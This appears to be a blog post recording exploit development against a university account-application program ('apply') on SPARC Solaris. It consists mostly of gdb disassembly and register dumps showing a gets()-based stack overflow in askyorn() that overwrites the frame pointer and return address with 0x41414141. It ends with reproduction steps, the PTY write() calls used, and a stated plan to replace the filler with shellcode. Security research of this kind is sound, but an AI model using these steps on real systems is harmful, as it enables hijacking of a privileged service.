<Acct+768> 0x00011788 <Acct+712>: nop 0x0001178c <Acct+716>: add %fp, -28, %o2 0x00011790 <Acct+720>: ld [ %o2 ], %o5 ---Type <return> to continue, or q <return> to quit---0x00011794 <Acct+724>: add %fp, -24, %o4 0x00011798 <Acct+728>: ld [ %o4 ], %g1 0x0001179c <Acct+732>: ldub [ %g1 ], %o3 0x000117a0 <Acct+736>: inc %g1 0x000117a4 <Acct+740>: st %g1, [ %o4 ] 0x000117a8 <Acct+744>: mov %o5, %g1 0x000117ac <Acct+748>: stb %o3, [ %g1 ] 0x000117b0 <Acct+752>: inc %o5 0x000117b4 <Acct+756>: st %o5, [ %o2 ] 0x000117b8 <Acct+760>: b 0x1173c <Acct+636> 0x000117bc <Acct+764>: nop 0x000117c0 <Acct+768>: ld [ %fp + -28 ], %g1 0x000117c4 <Acct+772>: clrb [ %g1 ] 0x000117c8 <Acct+776>: sethi %hi(0x29400), %g1 ---Type <return> to continue, or q <return> to quit---0x000117cc <Acct+780>: or %g1, 0xdc, %g1 ! 0x294dc <action> 0x000117d0 <Acct+784>: ld [ %g1 ], %g1 0x000117d4 <Acct+788>: cmp %g1, 1 0x000117d8 <Acct+792>: bne 0x117f0 <Acct+816> 0x000117dc <Acct+796>: nop 0x000117e0 <Acct+800>: sethi %hi(0x25800), %g1 0x000117e4 <Acct+804>: or %g1, 0x2b4, %o0 ! 0x25ab4 <Acct_inst3> 0x000117e8 <Acct+808>: call 0x13274 <blurb> 0x000117ec <Acct+812>: nop 0x000117f0 <Acct+816>: clr [ %fp + -32 ] 0x000117f4 <Acct+820>: b 0x1183c <Acct+892> 0x000117f8 <Acct+824>: nop 0x000117fc <Acct+828>: sethi %hi(0x13c00), %g1 0x00011800 <Acct+832>: or %g1, 0x238, %o0 ! 0x13e38 ---Type <return> to continue, or q <return> to quit---0x00011804 <Acct+836>: call 0x257d8 <printf@plt> 0x00011808 <Acct+840>: nop 0x0001180c <Acct+844>: b 0x114f4 <Acct+52> 0x00011810 <Acct+848>: nop 0x00011814 <Acct+852>: sethi %hi(0x13c00), %g1 0x00011818 <Acct+856>: or %g1, 0x258, %o0 ! 0x13e58 0x0001181c <Acct+860>: call 0x257d8 <printf@plt> 0x00011820 <Acct+864>: nop 0x00011824 <Acct+868>: sethi %hi(0x25800), %g1 0x00011828 <Acct+872>: or %g1, 0x290, %o0 ! 0x25a90 <Acct_inst2> 0x0001182c <Acct+876>: call 0x13274 <blurb> 0x00011830 <Acct+880>: nop 0x00011834 <Acct+884>: b 0x114f4 <Acct+52> 0x00011838 <Acct+888>: nop ---Type <return> to continue, or q <return> to quit---0x0001183c <Acct+892>: ld [ %fp + -32 ], %i0 0x00011840 <Acct+896>: ret 0x00011844 <Acct+900>: restore End of assembler dump. (gdb) Breakpoint 1 at 0x11840 (gdb) Starting program: /home/bazz/latest/apply-1.2-stock/apply (no debugging symbols found) warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1" (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) Welcome to -----, our host that handles account applications. This program collects information needed to create accounts, and queues applications for action by the system administrator. When all your information has been collected, you will have the chance to review your application and re-enter any information that is not correct. If you make a mistake in typing, you can back up on the line by pressing the DELETE key. Do not use the BACKSPACE or arrow keys to delete characters -- your input may appear to have been fixed but will really contain garbage. If you press the RETURN key before noticing an error, do not worry. Simply continue answering questions, and re-enter the information later during the review phase. Press RETURN to continue. Do you already have an account with us (y or n)? Enter your chosen login name. It can be up to 8 characters long, and should only use lowercase letters and digits. Please use your first initial and last name, as in jdoe, unless you have a strong preference otherwise. Login name? Please enter your full name. Be sure to use upper and lower case, as in John Q. Public. It is very important to get this right, as this is how your name will appear on lab access lists and in mail messages you send. Full name? Enter a password consisting of printable characters, spaces or tabs. It can be as long as you like, but only the first 8 characters matter. Do not use your login or real name in any form -- too easy to guess. **-*-* Do not give your password to anybody under any circumstances! *-*-** As you type in your password, characters will not be echoed to your screen. This is to protect your account. To be sure you did not mis-type anything, you will be asked to enter your password a second time. Password: Again: Please describe yourself by choosing one of these menu items: 1) ugrad Undergraduate student enrolled in one or more CS courses 2) grad Graduate student enrolled in one or more CS courses 3) alumni Alumnus of Math and CS 4) faculty Member of the Math and CS faculty 5) staff Member of the Math and CS professional or classified staff 6) crtsy Courtesy account applicant that has spoken to the Sys Admin 7) None of the above. (This will abandon the application!) Menu item number [1-7] or command [tpx?] : You must select one of the choices. Do you want to just forget the whole thing (y or n)? Menu item number [1-7] or command [tpx?] : Program received signal SIGSEGV, Segmentation fault. 0x00011588 in Acct () (gdb) Undefined command: "rx". Try "help". (gdb) Value can't be converted to integer. (gdb) g0 0x0 0 g1 0x31 49 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0x28d90 167312 o1 0x28d92 167314 o2 0x2919e 168350 o3 0x1 1 o4 0xff33c008 -13385720 o5 0x0 0 ---Type <return> to continue, or q <return> to quit---sp 0xffbefd40 0xffbefd40 o7 0x11510 70928 l0 0x41414141 1094795585 l1 0x41414141 1094795585 l2 0x41414141 1094795585 l3 0x41414141 1094795585 l4 0x41414141 1094795585 l5 0x41414141 1094795585 l6 0x41414141 1094795585 l7 0x41414141 1094795585 i0 0x41414141 1094795585 i1 0x41414141 1094795585 i2 0x41414141 1094795585 i3 0x41414141 1094795585 ---Type <return> to continue, or q <return> to quit---i4 0x41414141 1094795585 i5 0x41414141 1094795585 fp 0x41414141 0x41414141 i7 0x41414141 1094795585 y 0x0 0 psr 0xfe001005 -33550331 wim 0x0 0 tbr 0x0 0 pc 0x11588 0x11588 <Acct+200> npc 0x1158c 0x1158c <Acct+204> fsr 0x0 0 csr 0x0 0 (gdb) (gdb) (gdb) Delete all breakpoints? (y or n) (gdb) Dump of assembler code for function askyorn: 0x00012a30 <askyorn+0>: save %sp, -1152, %sp 0x00012a34 <askyorn+4>: st %i0, [ %fp + 0x44 ] 0x00012a38 <askyorn+8>: clr [ %fp + -1044 ] 0x00012a3c <askyorn+12>: ld [ %fp + -1044 ], %g1 0x00012a40 <askyorn+16>: cmp %g1, 9 0x00012a44 <askyorn+20>: bg 0x12b20 <askyorn+240> 0x00012a48 <askyorn+24>: nop 0x00012a4c <askyorn+28>: sethi %hi(0x15000), %g1 0x00012a50 <askyorn+32>: or %g1, 0x328, %o0 ! 0x15328 <_end+4039> 0x00012a54 <askyorn+36>: ld [ %fp + 0x44 ], %o1 0x00012a58 <askyorn+40>: call 0x257d8 <printf@plt> 0x00012a5c <askyorn+44>: nop 0x00012a60 <askyorn+48>: add %fp, -1040, %g1 ---Type <return> to continue, or q <return> to quit---0x00012a64 <askyorn+52>: mov %g1, %o0 0x00012a68 <askyorn+56>: call 0x25808 <gets@plt> 0x00012a6c <askyorn+60>: nop 0x00012a70 <askyorn+64>: ldub [ %fp + -1040 ], %g1 0x00012a74 <askyorn+68>: sll %g1, 0x18, %g1 0x00012a78 <askyorn+72>: sra %g1, 0x18, %g1 0x00012a7c <askyorn+76>: st %g1, [ %fp + -1052 ] 0x00012a80 <askyorn+80>: ld [ %fp + -1052 ], %g1 0x00012a84 <askyorn+84>: cmp %g1, 0x59 0x00012a88 <askyorn+88>: be 0x12ae0 <askyorn+176> 0x00012a8c <askyorn+92>: nop 0x00012a90 <askyorn+96>: ld [ %fp + -1052 ], %g1 0x00012a94 <askyorn+100>: cmp %g1, 0x59 0x00012a98 <askyorn+104>: bg 0x12ab8 <askyorn+136> ---Type <return> to continue, or q <return> to quit---0x00012a9c <askyorn+108>: nop 0x00012aa0 <askyorn+112>: ld [ %fp + -1052 ], %g1 0x00012aa4 <askyorn+116>: cmp %g1, 0x4e 0x00012aa8 <askyorn+120> be 0x12af0 <askyorn+192> 0x00012aac <askyorn+124>: nop 0x00012ab0 <askyorn+128>: b 0x12afc <askyorn+204> 0x00012ab4 <askyorn+132>: nop 0x00012ab8 <askyorn+136>: ld [ %fp + -1052 ], %g1 0x00012abc <askyorn+140>: cmp %g1, 0x6e 0x00012ac0 <askyorn+144>: be 0x12af0 <askyorn+192> 0x00012ac4 <askyorn+148>: nop 0x00012ac8 <askyorn+152>: ld [ %fp + -1052 ], %g1 0x00012acc <askyorn+156>: cmp %g1, 0x79 0x00012ad0 <askyorn+160>: be 0x12ae0 <askyorn+176> ---Type <return> to continue, or q <return> to quit---0x00012ad4 <askyorn+164>: nop 0x00012ad8 <askyorn+168>: b 0x12afc <askyorn+204> 0x00012adc <askyorn+172>: nop 0x00012ae0 <askyorn+176>: mov 1, %g1 ! 0x1 0x00012ae4 <askyorn+180>: st %g1, [ %fp + -1048 ] 0x00012ae8 <askyorn+184>: b 0x12b24 <askyorn+244> 0x00012aec <askyorn+188>: nop 0x00012af0 <askyorn+192>: clr [ %fp + -1048 ] 0x00012af4 <askyorn+196>: b 0x12b24 <askyorn+244> 0x00012af8 <askyorn+200>: nop 0x00012afc <askyorn+204>: sethi %hi(0x15000), %g1 0x00012b00 <askyorn+208>: or %g1, 0x338, %o0 ! 0x15338 <_end+4055> 0x00012b04 <askyorn+212>: call 0x257d8 <printf@plt> 0x00012b08 <askyorn+216>: nop ---Type <return> to continue, or q <return> to quit---0x00012b0c <askyorn+220>: ld [ %fp + -1044 ], %g1 0x00012b10 <askyorn+224>: inc %g1 0x00012b14 <askyorn+228>: st %g1, [ %fp + -1044 ] 0x00012b18 <askyorn+232>: b 0x12a3c <askyorn+12> 0x00012b1c <askyorn+236>: nop 0x00012b20 <askyorn+240>: clr [ %fp + -1048 ] 0x00012b24 <askyorn+244>: ld [ %fp + -1048 ], %i0 0x00012b28 <askyorn+248>: ret 0x00012b2c <askyorn+252>: restore End of assembler dump. (gdb) Breakpoint 2 at 0x12b28 (gdb) Num Type Disp Enb Address What 2 breakpoint keep y 0x00012b28 <askyorn+248> (gdb) Delete all breakpoints? (y or n) (gdb) Breakpoint 3 at 0x12b28 (gdb) The program being debugged has been started already. Start it from the beginning? (y or n) Starting program: /home/bazz/latest/apply-1.2-stock/apply (no debugging symbols found) warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1" (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) Welcome to ----, our host that handles account applications. This program collects information needed to create accounts, and queues applications for action by the system administrator. When all your information has been collected, you will have the chance to review your application and re-enter any information that is not correct. If you make a mistake in typing, you can back up on the line by pressing the DELETE key. Do not use the BACKSPACE or arrow keys to delete characters -- your input may appear to have been fixed but will really contain garbage. If you press the RETURN key before noticing an error, do not worry. Simply continue answering questions, and re-enter the information later during the review phase. Press RETURN to continue. Do you already have an account with us (y or n)? Breakpoint 3, 0x00012b28 in askyorn () (gdb) Continuing. Enter your chosen login name. It can be up to 8 characters long, and should only use lowercase letters and digits. Please use your first initial and last name, as in jdoe, unless you have a strong preference otherwise. Login name? Please enter your full name. Be sure to use upper and lower case, as in John Q. Public. It is very important to get this right, as this is how your name will appear on lab access lists and in mail messages you send. Full name? Enter a password consisting of printable characters, spaces or tabs. It can be as long as you like, but only the first 8 characters matter. Do not use your login or real name in any form -- too easy to guess. **-*-* Do not give your password to anybody under any circumstances! *-*-** As you type in your password, characters will not be echoed to your screen. This is to protect your account. To be sure you did not mis-type anything, you will be asked to enter your password a second time. Password: Again: Please describe yourself by choosing one of these menu items: 1) ugrad Undergraduate student enrolled in one or more CS courses 2) grad Graduate student enrolled in one or more CS courses 3) alumni Alumnus of Math and CS 4) faculty Member of the Math and CS faculty 5) staff Member of the Math and CS professional or classified staff 6) crtsy Courtesy account applicant that has spoken to the Sys Admin 7) None of the above. (This will abandon the application!) Menu item number [1-7] or command [tpx?] : You must select one of the choices. Do you want to just forget the whole thing (y or n)? Breakpoint 3, 0x00012b28 in askyorn () (gdb) $ unknown mode: cooked $ $ $ $ $ $ (gdb) $ $ (gdb) $ $ $ $ exit (gdb) x/96x $sp 0xffbef8c0: 0x000291a0 0x00028d91 0xff000000 0x00ff0000 0xffbef8d0: 0x0000ff00 0x81000000 0x7efefeff 0x81010100 0xffbef8e0: 0x00000000 0x00029190 0xff343a54 0x00000000 0xffbef8f0: 0xff33c008 0x00000000 0xffbefd40 0x00011630 0xffbef900: 0x00000000 0xff342fb0 0x00013da8 0x00000000 0xffbef910: 0x000292d1 0x00000024 0x00013da4 0x80000000 0xffbef920: 0x00000000 0x0000006e 0x00000000 0x00000000 0xffbef930: 0x6e414141 0x41414141 0x41414141 0x41414141 0xffbef940: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef950: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef960: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef970: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef980: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef990: 0x41414141 0x41414141 0x41414141 0x41414141 ---Type <return> to continue, or q <return> to quit--- 0xffbef9a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa00: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa10: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa20: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa30: 0x41414141 0x41414141 0x41414141 0x41414141 (gdb) i r g0 0x0 0 g1 0x6e 110 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0xffbef930 -4261584 o1 0xffbeff72 -4259982 o2 0x2919e 168350 o3 0x1 1 o4 0xff33c008 -13385720 o5 0x0 0 ---Type <return> to continue, or q <return> to quit--- sp 0xffbef8c0 0xffbef8c0 o7 0x12a68 76392 l0 0x291a0 168352 l1 0x28d91 167313 l2 0xff000000 -16777216 l3 0xff0000 16711680 l4 0xff00 65280 l5 0x81000000 -2130706432 l6 0x7efefeff 2130640639 l7 0x81010100 -2130640640 i0 0x0 0 i1 0x29190 168336 i2 0xff343a54 -13354412 i3 0x0 0 ---Type <return> to continue, or q <return> to quit--- i4 0xff33c008 -13385720 i5 0x0 0 fp 0xffbefd40 0xffbefd40 i7 0x11630 71216 y 0x0 0 psr 0xfe401005 -29356027 wim 0x0 0 tbr 0x0 0 pc 0x12b28 0x12b28 <askyorn+248> npc 0x12b2c 0x12b2c <askyorn+252> fsr 0x0 0 csr 0x0 0 (gdb) x/96x $sp 0xffbef8c0: 0x000291a0 0x00028d91 0xff000000 0x00ff0000 0xffbef8d0: 0x0000ff00 0x81000000 0x7efefeff 0x81010100 0xffbef8e0: 0x00000000 0x00029190 0xff343a54 0x00000000 0xffbef8f0: 0xff33c008 0x00000000 0xffbefd40 0x00011630 0xffbef900: 0x00000000 0xff342fb0 0x00013da8 0x00000000 0xffbef910: 0x000292d1 0x00000024 0x00013da4 0x80000000 0xffbef920: 0x00000000 0x0000006e 0x00000000 0x00000000 0xffbef930: 0x6e414141 0x41414141 0x41414141 0x41414141 0xffbef940: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef950: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef960: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef970: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef980: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef990: 0x41414141 0x41414141 0x41414141 0x41414141 ---Type <return> to continue, or q <return> to quit--- 0xffbef9a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa00: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa10: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa20: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa30: 0x41414141 0x41414141 0x41414141 0x41414141 (gdb) x/5i $pc 0x12b28 <askyorn+248>: ret 0x12b2c <askyorn+252>: restore 0x12b30 <mkpasswd>: save %sp, -136, %sp 0x12b34 <mkpasswd+4>: st %i0, [ %fp + 0x44 ] 0x12b38 <mkpasswd+8>: add %fp, -28, %g1 (gdb) si 0x00012b2c in askyorn () (gdb) 0x00011638 in Acct () (gdb) 0x0001163c in Acct () (gdb) 0x00011640 in Acct () (gdb) $ ^M^Mj: not found $ unknown mode: cho $ ^M^M: not found $ $ ^M^M: not found $ stty cooked $ $ exit (gdb) x/5i $pc 0x11640 <Acct+384>: be 0x114f4 <Acct+52> 0x11644 <Acct+388>: nop 0x11648 <Acct+392>: call 0x1320c <quit> 0x1164c <Acct+396>: nop 0x11650 <Acct+400>: b 0x114f4 <Acct+52> (gdb) x/96x $sp 0xffbefd40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefda0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefdb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefdc0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefdd0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefde0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefdf0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe00: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe10: 0x41414141 0x41414141 0x41414141 0x41414141 ---Type <return> to continue, or q <return> to quit--- 0xffbefe20: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe30: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefea0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefeb0: 0x41414141 0x41414141 0x41414141 0x41414141 (gdb) i r g0 0x0 0 g1 0x0 0 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0x0 0 o1 0x29190 168336 o2 0xff343a54 -13354412 o3 0x0 0 o4 0xff33c008 -13385720 o5 0x0 0 ---Type <return> to continue, or q <return> to quit--- sp 0xffbefd40 0xffbefd40 o7 0x11630 71216 l0 0x41414141 1094795585 l1 0x41414141 1094795585 l2 0x41414141 1094795585 l3 0x41414141 1094795585 l4 0x41414141 1094795585 l5 0x41414141 1094795585 l6 0x41414141 1094795585 l7 0x41414141 1094795585 i0 0x41414141 1094795585 i1 0x41414141 1094795585 i2 0x41414141 1094795585 i3 0x41414141 1094795585 ---Type <return> to continue, or q <return> to quit--- i4 0x41414141 1094795585 i5 0x41414141 1094795585 fp 0x41414141 0x41414141 i7 0x41414141 1094795585 y 0x0 0 psr 0xfe401001 -29356031 wim 0x0 0 tbr 0x0 0 pc 0x11640 0x11640 <Acct+384> npc 0x11644 0x11644 <Acct+388> fsr 0x0 0 csr 0x0 0 (gdb)
You can’t even see what I type often times, cause the echo has to be turned off for some reason…. It gets tough, you cannot CTRL-C out of the session into GDB because you are in RAW MODE. so I set a breakpoint:
b *0x00012b28
which is inside askyorn before the ret restore. Note that it will take another ret/restore to load the infected return address.
and suffer having to go through it once before I actually wanted to (not bad really, that’s lucky). once I found a good break point, went thru the program, breaked. I put my terminal into cooked mode by invoking gdb shell and calling
stty cooked; stty echo;
that’s what let me get the pretty gdb printouts again…
In summary to get to this wonderful stack vulnerability location:
1) say you’re a new user
2) type in your name / username /password twice. then hit ‘x’
3) at the ‘X’, do an ‘n’ without hitting CTRL-J followed immediately by 1600 of buffer trash.
To follow up here would be to use the getsmashoffset program I created to help locate exactly how many bytes it takes to the %fp and then to smash the fuck out of it with some shellcode in the PTY buffer instead of ‘A’
Checking PTY buffer send size
I originally got back to promised land by using
write (fd_master,buff2,200);
and I sent enough increments of 200 to equal 1600 followed by a CTRL-J
I have now tested that
write (fd_master,buff2,1600);
will also work just right.
Leave a Reply